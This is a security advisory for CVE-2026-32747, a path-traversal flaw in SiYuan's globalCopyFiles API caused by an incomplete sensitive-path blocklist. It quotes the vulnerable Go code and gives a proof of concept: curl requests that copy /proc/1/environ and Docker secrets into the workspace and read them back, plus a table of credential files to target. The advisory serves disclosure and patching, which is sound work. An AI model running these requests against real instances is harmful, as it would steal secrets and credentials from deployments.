CVE-2026-32747

CVSS v3.1

6.8

Vector

AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Summary

POST /api/file/globalCopyFiles

reads source files using

filepath.Abs()

with no workspace boundary check, relying solely on

util.IsSensitivePath()

whose blocklist omits

/proc/

/run/secrets/

, and home directory dotfiles. An admin can copy

/proc/1/environ

or Docker secrets into the workspace and read them via the standard file API.

Details

File:

kernel/api/file.go

- function

globalCopyFiles

for i, src := range srcs {
  absSrc,  := filepath.Abs(src)  // not restricted to workspace

  if util.IsSensitivePath(absSrc) { // blocklist is incomplete
    return
  }
  srcs[i] = absSrc
}
destDir := filepath.Join(util.WorkspaceDir, destDir)
for , src := range srcs {
  dest := filepath.Join(destDir, filepath.Base(src))
  filelock.Copy(src, dest)  // copies unchecked sensitive file into workspace
}

IsSensitivePath
blocklist (

kernel/util/path.go

prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."}

Not blocked - exploitable targets:

Path	Contains
`/proc/1/environ`	All env vars: `DATABASE URL` , `AWS ACCESS KEY ID` , `ANTHROPIC API KEY`
`/run/secrets/*`	Docker Swarm / Compose injected secrets
`/home/siyuan/.aws/credentials`	AWS credentials (non-root user)
`/home/siyuan/.ssh/id rsa`	SSH private key (non-root user)
`/tmp/`	Temporary files including tokens

PoC

Environment:

docker run -d --name siyuan -p 6806:6806 
 -v $(pwd)/workspace:/siyuan/workspace 
 b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

TOKEN="YOUR ADMIN TOKEN"

# Step 1: Copy /proc/1/environ (process env vars) into workspace assets
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}'

# Step 2: Read the copied file via standard API
curl -s -X POST http://localhost:6806/api/file/getFile 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d '{"path":"/data/assets/environ"}' | tr '0' '
'

# Output: HOSTNAME=abc
PATH=/usr/local/sbin:...
DATABASE URL=postgres://...
API KEY=sk-...

Docker secrets:

# Copy all Docker-injected secrets
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d '{"srcs":["/run/secrets/db password","/run/secrets/api token"],"destDir":"data/assets/"}'

Impact

An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.

Fix

Incomplete List of Disallowed Inputs

Path traversal

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-184CWE-22

Related Identifiers

CVE-2026-32747

GHSA-H5VH-M7FG-W5H6

Affected Products

Github.Com/Siyuan-Note/Siyuan/Kernel

CVE-2026-32747

Summary

Details

PoC

Impact

Weakness Enumeration

Related Identifiers

Affected Products

References · 3